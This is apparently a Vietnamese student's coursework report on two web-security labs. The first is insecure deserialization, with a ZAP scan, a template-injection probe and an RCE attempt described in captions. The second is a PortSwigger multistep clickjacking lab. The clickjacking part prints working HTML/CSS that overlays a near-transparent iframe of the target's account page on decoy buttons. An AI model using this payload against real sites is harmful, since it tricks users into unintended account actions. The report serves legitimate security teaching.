HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNGKHOA AN TOÀN THÔNG TIN HỌC PHẦN: AN TOÀN ỨNG DỤNG WEB VÀ CSDL BÁO CÁO BÀI THỰC HÀNH 2 Sinh viên : Nguyễn Kiều Tuấn Anh Mã sinh viên: B21DCAT034 Giả
Trang 1HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG
KHOA AN TOÀN THÔNG TIN
HỌC PHẦN: AN TOÀN ỨNG DỤNG WEB VÀ CSDL
BÁO CÁO BÀI THỰC HÀNH 2
Sinh viên : Nguyễn Kiều Tuấn Anh
Mã sinh viên: B21DCAT034
Giảng viên: Ninh Thị Thu Trang
Hà nội, tháng 10/ 2024
Trang 2Mục Lục
1 Khai thác lỗ hổng Insecure Deserialization 2
Lý thuyết 2
Thực hành 2
2 Clickjacking lab-multistep 10
Lý thuyết: 10
Thực hành 10
Nguồn tham khảo: 13
Trang 31 Khai thác lỗ hổng Insecure Deserialization
Lý thuyết
Lỗ hổng Insecure Deserialization (tạm dịch: bất an trong việc tuần tự hóa dữ liệu) là một lỗ hổng bảo mật nghiêm trọng liên quan đến việc dữ liệu bị tuần tự hóa (serialization) và giải tuần tự (deserialization) mà không được kiểm soát chặt chẽ Khi ứng dụng thực hiện việc giải tuần tự hóa dữ liệu đầu vào mà không xác minh nguồn gốc và tính hợp lệ của dữ liệu, kẻ tấn công có thể khai thác để thực thi mã độc, leo thang đặc quyền hoặc thay đổi hành vi của hệ thống
Thực hành
Ảnh 1: Bật phần mềm OWASP để quét trang web
Trang 4Ảnh 2: Cáu hình để đặt OSWAP làm proxy
Ảnh 3: Chọn Add Exception để tiếp tục truy cập
Trang 5Ảnh 4: Thấy một số url dẫn đến trang của admin
Ảnh 5: Trang api-docs cũng được scan thấy
Trang 6Ảnh 6: Thử nút Try để gửi request và nhận lỗi 401 Unauthorized
Ảnh 7 : Sau khi đăng nhập ta lấy token phiên đăng nhập để dán vào request
Trang 7Ảnh 8: Nhiệm vụ 5 sau khi dán token thì gửi request ta được response 200 OK
Ảnh 9: Thực hiện nhiệm vụ 6 nhưng nhận được trạng thái là 500
Trang 8Ảnh 10: Ảnh thành công của nhiệm vụ 7- nhận được phản hồi 503
Ảnh 11: Đổi tên để kiểm tra xem trang web có bị lỗi template injection không
Trang 9Ảnh 12: Nhập #{1+1} thì thấy khả năng trang web có thể bị dính injection
Trang 10Ảnh 13: Nhiệm vụ 8 thực hiện code RCE như khi wget thì nhận lỗi 404
Ảnh 14: Ảnh check work và nộp bài
Trang 112 Clickjacking lab-multistep
Lý thuyết:
Clickjacking là một kiểu tấn công mà kẻ xấu lừa người dùng nhấp vào một nội dung trên một trang web giả mạo, nhưng thực tế lại nhấp vào một nút ẩn trên một trang web khác Ví dụ, khi người dùng truy cập một trang giả mạo và nhấn vào nút để nhận quà,
họ có thể vô tình thực hiện một hành động không mong muốn, như thanh toán tiền cho một tài khoản khác.Tấn công này sử dụng một trang ẩn (iframe) được đặt lên trên trang web mà người dùng thấy
Thực hành
Ta quan tâm đến đoạn code sau khi chèn vào phần body
<style>
iframe {
position: relative;
width: 500px;
height: 700px;
opacity: 0.001;
z-index: 2;
}
.firstClick, secondClick {
position: absolute;
top: 490px;
left: 50px; z-index: 1;
}
.secondClick {
top: 290px;
left: 200px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe
src="https://0a04004203b9de9782205b0a00c300f7.web-security-academy.net/my-account"></iframe>
- Thay đổi các giá trị top, left ở firstClick và secondClick để nó được chèn lên các button của trang web
- Biến opacity là để điều chỉ độ mờ của web cần che giấu đi
- Trong phần <iframe src=> điều url của lab đang thực hiện
Trang 12Ảnh 15: Điều chỉnh sao cho firstClick nằm chính xác vào nút ẩn
Ảnh 16: Điều chỉnh code sao cho secondClick nằm đúng vị trí của nút ẩn
Trang 13Ảnh 17: Điều chỉnh giá trị opacity để ẩn web cần giấu và chỉ hiển thị web giả mạo
Ảnh 18: Thành công giải được bài lab sau khi chọn Deliver exploit to victim
Trang 14Nguồn tham khảo:
https://portswigger.net/web-security/clickjacking/lab-multistep